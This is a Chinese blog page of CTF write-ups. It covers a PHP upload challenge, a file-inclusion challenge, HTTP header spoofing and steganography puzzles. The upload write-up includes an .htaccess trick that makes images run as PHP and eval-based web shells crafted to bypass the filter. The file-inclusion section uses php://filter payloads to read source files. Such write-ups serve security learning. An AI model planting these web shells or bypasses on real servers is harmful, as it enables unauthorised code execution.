<h2 id="GXYCTF2019-Baby-Upload">[GXYCTF2019]Baby Upload</h2>
<p>本题源代码 index.php：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;meta http-equiv=\&quot;Content-Type\&quot; content=\&quot;text/html; charset=utf-8\&quot; /&gt; </span></span><br><span class="line"><span class="string">&lt;title&gt;Upload&lt;/title&gt;</span></span><br><span class="line"><span class="string">&lt;form action=\&quot;\&quot; method=\&quot;post\&quot; enctype=\&quot;multipart/form-data\&quot;&gt;</span></span><br><span class="line"><span class="string">上传文件&lt;input type=\&quot;file\&quot; name=\&quot;uploaded\&quot; /&gt;</span></span><br><span class="line"><span class="string">&lt;input type=\&quot;submit\&quot; name=\&quot;submit\&quot; value=\&quot;上传\&quot; /&gt;</span></span><br><span class="line"><span class="string">&lt;/form&gt;&quot;</span>;</span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;user&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$_SESSION</span>[<span class="string">&#x27;user&#x27;</span>] = <span class="title function_ invoke__">md5</span>((<span class="keyword">string</span>)<span class="title function_ invoke__">time</span>() . (<span class="keyword">string</span>)<span class="title function_ invoke__">rand</span>(<span class="number">100</span>, <span class="number">1000</span>));</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;uploaded&#x27;</span>])) &#123;</span><br><span class="line">    <span class="variable">$target_path</span>  = <span class="title function_ invoke__">getcwd</span>() . <span class="string">&quot;/upload/&quot;</span> . <span class="title function_ invoke__">md5</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;user&#x27;</span>]);</span><br><span class="line">    <span class="variable">$t_path</span> = <span class="variable">$target_path</span> . <span class="string">&quot;/&quot;</span> . <span class="title function_ invoke__">basename</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;uploaded&#x27;</span>][<span class="string">&#x27;name&#x27;</span>]);</span><br><span class="line">    <span class="variable">$uploaded_name</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;uploaded&#x27;</span>][<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line">    <span class="variable">$uploaded_ext</span>  = <span class="title function_ invoke__">substr</span>(<span class="variable">$uploaded_name</span>, <span class="title function_ invoke__">strrpos</span>(<span class="variable">$uploaded_name</span>,<span class="string">&#x27;.&#x27;</span>) + <span class="number">1</span>);</span><br><span class="line">    <span class="variable">$uploaded_size</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;uploaded&#x27;</span>][<span class="string">&#x27;size&#x27;</span>];</span><br><span class="line">    <span class="variable">$uploaded_tmp</span>  = <span class="variable">$_FILES</span>[<span class="string">&#x27;uploaded&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line"> </span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/ph/i&quot;</span>, <span class="title function_ invoke__">strtolower</span>(<span class="variable">$uploaded_ext</span>)))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;后缀名不能有ph！&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (((<span class="variable">$_FILES</span>[<span class="string">&quot;uploaded&quot;</span>][<span class="string">&quot;type&quot;</span>] == <span class="string">&quot;</span></span><br><span class="line"><span class="string">            &quot;</span>) || (<span class="variable">$_FILES</span>[<span class="string">&quot;uploaded&quot;</span>][<span class="string">&quot;type&quot;</span>] == <span class="string">&quot;image/jpeg&quot;</span>) || (<span class="variable">$_FILES</span>[<span class="string">&quot;uploaded&quot;</span>][<span class="string">&quot;type&quot;</span>] == <span class="string">&quot;image/pjpeg&quot;</span>)) &amp;&amp; (<span class="variable">$_FILES</span>[<span class="string">&quot;uploaded&quot;</span>][<span class="string">&quot;size&quot;</span>] &lt; <span class="number">2048</span>))&#123;</span><br><span class="line">            <span class="variable">$content</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$uploaded_tmp</span>);</span><br><span class="line">            <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/\&lt;\?/i&quot;</span>, <span class="variable">$content</span>))&#123;</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&quot;诶，别蒙我啊，这标志明显还是php啊&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span>&#123;</span><br><span class="line">                <span class="title function_ invoke__">mkdir</span>(<span class="title function_ invoke__">iconv</span>(<span class="string">&quot;UTF-8&quot;</span>, <span class="string">&quot;GBK&quot;</span>, <span class="variable">$target_path</span>), <span class="number">0777</span>, <span class="literal">true</span>);</span><br><span class="line">                <span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$uploaded_tmp</span>, <span class="variable">$t_path</span>);</span><br><span class="line">                <span class="keyword">echo</span> <span class="string">&quot;<span class="subst">&#123;$t_path&#125;</span> succesfully uploaded!&quot;</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;上传类型也太露骨了吧！&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>这是一个用于文件上传的PHP脚本，它包含一些安全检查。以下是主要组件和安全措施的简要说明：</p>
<ol>
<li>
<p><strong>会话管理：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;user&#x27;</span>])) &#123;</span><br><span class="line">    <span class="variable">$_SESSION</span>[<span class="string">&#x27;user&#x27;</span>] = <span class="title function_ invoke__">md5</span>((<span class="keyword">string</span>)<span class="title function_ invoke__">time</span>() . (<span class="keyword">string</span>)<span class="title function_ invoke__">rand</span>(<span class="number">100</span>, <span class="number">1000</span>));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>脚本启动会话，并在不存在时生成一个唯一的用户标识符（<code>$_SESSION['user']</code>）。此标识符用于为每个用户创建一个唯一的目录。</p>
</li>
<li>
<p><strong>文件上传表单：</strong></p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;<span class="tag">&lt;<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">\</span>&quot;<span class="attr">Content-Type</span>\&quot; <span class="attr">content</span>=<span class="string">\</span>&quot;<span class="attr">text</span>/<span class="attr">html</span>; <span class="attr">charset</span>=<span class="string">utf-8\</span>&quot; /&gt;</span> </span><br><span class="line"><span class="tag">&lt;<span class="name">title</span>&gt;</span>Upload<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">\</span>&quot;\&quot; <span class="attr">method</span>=<span class="string">\</span>&quot;<span class="attr">post</span>\&quot; <span class="attr">enctype</span>=<span class="string">\</span>&quot;<span class="attr">multipart</span>/<span class="attr">form-data</span>\&quot;&gt;</span></span><br><span class="line">   上传文件<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">\</span>&quot;<span class="attr">file</span>\&quot; <span class="attr">name</span>=<span class="string">\</span>&quot;<span class="attr">uploaded</span>\&quot; /&gt;</span></span><br><span class="line">   <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">\</span>&quot;<span class="attr">submit</span>\&quot; <span class="attr">name</span>=<span class="string">\</span>&quot;<span class="attr">submit</span>\&quot; <span class="attr">value</span>=<span class="string">\</span>&quot;<span class="attr">上传</span>\&quot; /&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span>&quot;;</span><br></pre></td></tr></table></figure>
<p>HTML表单允许用户上传文件。表单具有用于文件上传的必要属性（<code>enctype=&quot;multipart/form-data&quot;</code>）。</p>
</li>
<li>
<p><strong>文件上传处理：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;uploaded&#x27;</span>])) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>脚本检查是否提交了文件。</p>
</li>
<li>
<p><strong>文件上传验证：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/ph/i&quot;</span>, <span class="title function_ invoke__">strtolower</span>(<span class="variable">$uploaded_ext</span>)))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;后缀名不能有ph！&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>检查文件扩展名是否包含&quot;ph&quot;（不区分大小写），如果是则终止脚本。</p>
</li>
<li>
<p><strong>文件类型和大小验证：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (((<span class="variable">$_FILES</span>[<span class="string">&quot;uploaded&quot;</span>][<span class="string">&quot;type&quot;</span>] == <span class="string">&quot;image/gif&quot;</span>) || (<span class="variable">$_FILES</span>[<span class="string">&quot;uploaded&quot;</span>][<span class="string">&quot;type&quot;</span>] == <span class="string">&quot;image/jpeg&quot;</span>) || (<span class="variable">$_FILES</span>[<span class="string">&quot;uploaded&quot;</span>][<span class="string">&quot;type&quot;</span>] == <span class="string">&quot;image/pjpeg&quot;</span>)) &amp;&amp; (<span class="variable">$_FILES</span>[<span class="string">&quot;uploaded&quot;</span>][<span class="string">&quot;size&quot;</span>] &lt; <span class="number">2048</span>))&#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>检查文件类型是否为图像（GIF、JPEG或PJPEG），以及文件大小是否小于2048字节（2 KB）。如果满足这些条件，脚本将继续进行进一步检查。</p>
</li>
<li>
<p><strong>PHP文件的内容检查：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$content</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$uploaded_tmp</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/\&lt;\?/i&quot;</span>, <span class="variable">$content</span>))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;诶，别蒙我啊，这标志明显还是php啊&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>脚本读取上传文件的内容，并检查是否存在PHP开标签。如果找到，则终止脚本。</p>
</li>
<li>
<p><strong>安全的文件存储：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">mkdir</span>(<span class="title function_ invoke__">iconv</span>(<span class="string">&quot;UTF-8&quot;</span>, <span class="string">&quot;GBK&quot;</span>, <span class="variable">$target_path</span>), <span class="number">0777</span>, <span class="literal">true</span>);</span><br><span class="line"><span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$uploaded_tmp</span>, <span class="variable">$t_path</span>);</span><br></pre></td></tr></table></figure>
<p>脚本为每个用户创建一个带有唯一标识符的目录，然后将上传的文件移动到该目录中。</p>
</li>
<li>
<p><strong>输出消息：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">echo</span> <span class="string">&quot;<span class="subst">&#123;$t_path&#125;</span> succesfully uploaded!&quot;</span>;</span><br></pre></td></tr></table></figure>
<p>如果所有检查都通过，它会打印一个包含上传文件路径的成功消息。</p>
</li>
</ol>
<p>本题部分wp：</p>
<p>先上传一个.htaccess文件，内容如下</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">&lt;FilesMatch <span class="string">&quot;\.jpg&quot;</span>&gt;</span></span><br><span class="line">  <span class="attribute">SetHandler</span> application/x-httpd-php</span><br><span class="line"><span class="section">&lt;/FilesMatch&gt;</span></span><br></pre></td></tr></table></figure>
<p>.htaccess文件是Apache服务中的一个配置文件，它负责相关目录下的网页配置。通过htaccess文件，可以帮助我们实现：网页301重定向、自定义404错误页面，改变文件扩展名、允许/阻止特定的用户或者目录的访问，禁止目录列表，配置默认文档等功能。</p>
<p>其中.htaccess文件内容：</p>
<p>&lt;FileMatch “.jpg”&gt;是对于文件后缀名的匹配</p>
<p>SetHandler application/x-http-php的意思是设置当前目录所有文件都使用php解析，那么无论上传任何文件，只要符合php语言代码规范，就会被当做PHP执行。不符合规则则报错</p>
<p>在本题中：对于上传文件的type做出了严格的限制，所以在上传.htaccess时需要把文件Type改成image/jpeg</p>
<p>在完成上传后，正常上传一句话木马，但是本题对于content也有过滤，所以：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;password&#x27;</span>]); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>中的&lt;?会被过滤，此时可以对木马进行改进：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language=<span class="string">&#x27;php&#x27;</span>&gt;</span><br><span class="line"><span class="keyword">eval</span>(@<span class="variable">$_POST</span>[<span class="string">&#x27;password&#x27;</span>]);</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p>文件显示正常上传后使用蚁剑进行连接，注意：上传的文件名仍然为.jpg，所以在连接的时候依然要写jpg文件名，但是由于htaccess文件，jpg会默认被解析成为php。</p>
<h2 id="FSCTF2023-巴巴托斯">[FSCTF2023]巴巴托斯</h2>
<p>首先在首页看到如下提示：</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Access Denied! I love FSCTF Browser</span><br></pre></td></tr></table></figure>
<p>提示要用特定浏览器，猜测要修改UA头</p>
<p>更改User-Agent: FSCTF Browser</p>
<p>注意此处写FSCTF不对 要把Browser也加上</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Access Denied! Are you local man?</span><br></pre></td></tr></table></figure>
<p>提示需要本地访问</p>
<p>在修改XFF头和Client-IP无效后，尝试把Referer头修改为127.0.0.1成功</p>
<p>BP返回的包显示 200 OK 则连接正常 但是页面没有任何回显</p>
<p>在BP数据包的第一行可以看到：</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /index.php?file=show_image.php</span><br></pre></td></tr></table></figure>
<p>看到file参数则容易联想到文件包含问题</p>
<p>可以用php伪协议包含本页源代码，查看网站的限制</p>
<p>file=php://filter/read=convert.base64-encode/resource=index.php</p>
<p>解码后得到如下结果：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$in_name</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$in_name</span>)) &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$in_name</span> === <span class="string">&#x27;show_image.php&#x27;</span>) &#123;</span><br><span class="line">    	<span class="comment">// 直接包含文件</span></span><br><span class="line">    	<span class="keyword">include</span>(<span class="variable">$in_name</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 检查特定的 User-Agent 和 Referer 头</span></span><br><span class="line">    <span class="variable">$user_agent</span> = <span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_USER_AGENT&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 检查来源地址是否为 127.0.0.1</span></span><br><span class="line">    <span class="variable">$ip_address</span> = <span class="variable">$_SERVER</span>[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$user_agent</span> =&lt;span style=<span class="string">&quot;font-weight: bold;&quot;</span> <span class="class"><span class="keyword">class</span>=&quot;<span class="title">mark</span>&quot;&gt; &#x27;<span class="title">FSCTF</span> <span class="title">Browser</span>&#x27;) </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_REFERER&#x27;</span>]) &amp;&amp; <span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_REFERER&#x27;</span>] &lt;/span&gt;= <span class="string">&#x27;127.0.0.1&#x27;</span>) &#123;</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 检查文件是否存在和可读</span></span><br><span class="line">            <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$in_name</span>)) &#123;</span><br><span class="line">  		<span class="keyword">include</span>(<span class="variable">$in_name</span>);</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="keyword">echo</span> <span class="string">&quot;Invalid file!&quot;</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;Access Denied! Are you local man?&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Access Denied! I love FSCTF Browser&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="title function_ invoke__">header</span>(<span class="string">&#x27;Location: index.php?file=show_image.php&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>尝试常见的flag文件名，最终file=php://filter/read=convert.base64-encode/resource=flag.php</p>
<p>进行base64解码得到flag</p>
<h2 id="GeekChallenge2023-ezhttp">[GeekChallenge2023]ezhttp</h2>
<p>HTTP请求头详解：<a class="link"   target="_blank" rel="noopener" href="https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers" >HTTP 标头（header） - HTTP | MDN (mozilla.org)<i class="fas fa-external-link-alt"></i></a></p>
<p>第一步提示：请post传参username和password进行登录</p>
<p>尝试使用admin+123456，但提示密码错误</p>
<p>查看网页源代码发现hint：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">&quot;Content-Type&quot;</span> <span class="attr">content</span>=<span class="string">&quot;text/html; charset=UTF-8&quot;</span> /&gt;</span>请post传参username和password进行登录<span class="tag">&lt;<span class="name">br</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span><span class="comment">&lt;!--密码有点记不住,所以我把密码记在了不想让爬虫获取的地方!--&gt;</span></span><br></pre></td></tr></table></figure>
<p>反爬虫协议参考链接：<a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/xiaoyun5555/article/details/112585413" >爬虫入门以及反爬协议——简单易懂_遵循反爬协议_可可宋的博客-CSDN博客<i class="fas fa-external-link-alt"></i></a></p>
<p>此处也可以用dirsearch等工具发现robots文件</p>
<p>故在URL内进行拼接：<a class="link"   target="_blank" rel="noopener" href="http://1.117.175.65:23333/robots.txt" >http://1.117.175.65:23333/robots.txt<i class="fas fa-external-link-alt"></i></a> 查看robots协议</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">User-agent: *</span><br><span class="line"></span><br><span class="line">Disallow: /o2takuXX&#x27;s_username_and_password.txt</span><br></pre></td></tr></table></figure>
<p>看到以上内容，在URL内进行访问<a class="link"   target="_blank" rel="noopener" href="http://1.117.175.65:23333/o2takuXX's_username_and_password.txt" >http://1.117.175.65:23333/o2takuXX’s_username_and_password.txt<i class="fas fa-external-link-alt"></i></a> 获得账号密码</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">username:admin</span><br><span class="line">password:@dm1N123456r00t#</span><br></pre></td></tr></table></figure>
<p>根据题目要求进行post传参，payload如下：</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://1.117.175.65:23333/</span><br><span class="line"></span><br><span class="line">post： username=admin&amp;password=@dm1N123456r00t#</span><br></pre></td></tr></table></figure>
<p>网页提示如下：</p>
<p>admin用户登录成功</p>
<p>开始认证…</p>
<p><a class="link"   target="_blank" rel="noopener" href="http://xn--sycsec-2m3lx71c4gppu9bt4zc.com/" >必须来源自sycsec.com<i class="fas fa-external-link-alt"></i></a></p>
<p>则修改Referer头为：<a class="link"   target="_blank" rel="noopener" href="http://sycsec.com/" >sycsec.com<i class="fas fa-external-link-alt"></i></a></p>
<p>请使用Syclover浏览器</p>
<p>修改User-Agent头为：Syclover</p>
<p>请从localhost访问</p>
<p>添加XFF头为：127.0.0.1</p>
<p>请使用Syc.vip代理</p>
<p>添加via头为：Syc.vip</p>
<p>页面如下提示：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_O2TAKUXX&#x27;</span>]==<span class="string">&quot;GiveMeFlag&quot;</span>)&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>
<h2 id="LitCTF-2024-Misc">[LitCTF 2024]Misc</h2>
<h4 id="盯帧珍珠">盯帧珍珠</h4>
<p>拖入010发现是GIF</p>
<p><a target="_blank" rel="noopener" href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240601120842858.png"><img  
                       lazyload
                       alt="image"
                       data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240601120842858.png"
                        alt="image-20240601120842858"
                 ></a></p>
<p>修改后缀名为gif后在线网站分帧提取</p>
<p><a target="_blank" rel="noopener" href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240601121030908.png"><img  
                       lazyload
                       alt="image"
                       data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240601121030908.png"
                        alt="image-20240601121030908"
                 ></a></p>
<p>flag：LitCTF{You_are_really_staring_at_frames}</p>
<h4 id="涐贪恋和伱、甾―⑺de毎兮毎秒">涐贪恋和伱、甾―⑺dé毎兮毎秒</h4>
<p>LSB隐写，用zsteg</p>
<p><a target="_blank" rel="noopener" href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240601121302472.png"><img  
                       lazyload
                       alt="image"
                       data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240601121302472.png"
                        alt="image-20240601121302472"
                 ></a></p>
<p>flag：LitCTF{e8f7b267-9c45-4c0e-9d1e-13fc5bcb9bd6}</p>
<h4 id="你说得对，但">你说得对，但__</h4>
<p>010发现图片末尾有zip，foremost提取</p>
<p><a target="_blank" rel="noopener" href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240601121458264.png"><img  
                       lazyload
                       alt="image"
                       data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240601121458264.png"
                        alt="image-20240601121458264"
                 ></a></p>
<p>解压得到四张图片，是二维码四个部分，用ps拼在一起扫码</p>
<p><a target="_blank" rel="noopener" href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240601121604388.png"><img  
                       lazyload
                       alt="image"
                       data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240601121604388.png"
                        alt="image-20240601121604388"
                 ></a></p>
<p>flag：LitCTF{Genshin_St@rt!!}</p>
<h4 id="原铁，启动！">原铁，启动！</h4>
<p>提瓦特文字+星铁文字</p>
<p><a target="_blank" rel="noopener" href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240601121851345.png"><img  
                       lazyload
                       alt="image"
                       data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240601121851345.png"
                        alt="image-20240601121851345"
                 ></a></p>
<p><a target="_blank" rel="noopener" href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240601121822957.png"><img  
                       lazyload
                       alt="image"
                       data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240601121822957.png"
                        alt="image-20240601121822957"
                 ></a></p>
<p>flag：LitCTF{good_gamer}</p>
<h4 id="Everywhere-We-Go">Everywhere We Go</h4>
<p>听歌，1分10秒处有问题</p>
<p>audacity打开 看频谱图得到flag</p>
<p><a target="_blank" rel="noopener" href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240601122024966.png"><img  
                       lazyload
                       alt="image"
                       data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240601122024966.png"
                        alt="image-20240601122024966"
                 ></a></p>
<!-- flag of hidden posts -->
                    
                </div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                    </div>
                    <div>
                        
                    </div>
                </div>

                

                

                
                    


    <div class="comments-container border-box">
        <div id="comments-anchor" class="comment-area-title border-box">
            <i class="fas fa-comments"></i>&nbsp;评论
        </div>
        <div class="comment-plugin-fail border-box">
    <span class="fail-tip">评论插件加载失败</span>
    <button class="reload keep-button">点击重新加载</button>
</div>
<div class="comment-plugin-loading flex-center border-box">
    <i class="loading-icon fa-solid fa-spinner fa-spin"></i>
    <span class="load-tip">正在加载评论插件</span>
</div>
<script data-pjax>
  window.KeepCommentPlugin = {}
  window.KeepCommentPlugin.hideLoading = () => {
